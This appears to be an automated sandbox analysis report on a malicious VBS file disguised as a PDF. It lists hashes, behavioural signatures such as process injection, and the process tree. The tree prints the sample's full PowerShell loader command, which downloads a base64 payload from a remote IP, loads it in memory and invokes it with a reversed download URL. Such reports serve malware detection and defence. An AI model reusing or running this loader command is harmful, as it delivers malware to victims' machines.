Analysis
max time kernel: 119s
max time network: 122s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 24-12-2024 02:29
Static task: static1
Behavioral task: behavioral1
    Sample: BXA09QOPKJHVRFVU_001_PDF.exe
    Resource: win7-20240903-en
Behavioral task: behavioral2
    Sample: BXA09QOPKJHVRFVU_001_PDF.exe
    Resource: win10v2004-20241007-en
Behavioral task: behavioral3
    Sample: RWVQ04HDJSNYKSDF03BD_002_PDF.vbs
    Resource: win7-20240708-en
Behavioral task: behavioral4
    Sample: RWVQ04HDJSNYKSDF03BD_002_PDF.vbs
    Resource: win10v2004-20241007-en
General
Target: RWVQ04HDJSNYKSDF03BD_002_PDF.vbs
Size: 129KB
MD5: 1befa9ba6ebbb499691b9ba6e4dec4ae
SHA1: a39f41c971b09a4928c86717deab8cfb5242bc52
SHA256: f119b656cd5a8a68ac35e37d8da3b090300757afda4616f67ba13369f20e459c
SHA512: 91f7550d39963faa56df8116fadd44977fffbc22a0d92e2c43f95116276fa154633785a7bf1f0c5d1e644211f880ea44a57968a85670f5481cacdef67a96a06b
SSDEEP: 48:qTlqlqlqlqlqlqlqllgu3gMg1gxg9gfgdWegXgtogEPgNogZg2gkgE3Vo9jgLE3M:eAAAAAAAN/edkUDVo9teK7vtReq0yO
Malware Config
Extracted URL: http://20.106.255.48/dll/lnk.pdf
Signatures
Blocklisted process makes network request (1 IoCs)
    flow 4; pid 1768; process powershell.exe
    pid 1768; process powershell.exe
Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
    pid 1768; process powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
    description: Token: SeDebugPrivilege; pid 1768; process powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
    description: PID 1476 wrote to memory of 1768; pid 1476; process WScript.exe; procid_target 30
    description: PID 1476 wrote to memory of 1768; pid 1476; process WScript.exe; procid_target 30
    description: PID 1476 wrote to memory of 1768; pid 1476; process WScript.exe; procid_target 30
Processes
1. C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RWVQ04HDJSNYKSDF03BD_002_PDF.vbs"
    PID: 1476
    Signatures: Suspicious use of WriteProcessMemory
    2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/lnk.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('a2ffd275242b-2c58-8cf4-d0d6-6c8ebba9=nekot&aidem=tla?txt.40WHT/o/moc.topsppa.edfd7-pohe/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
        PID: 1768
        Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken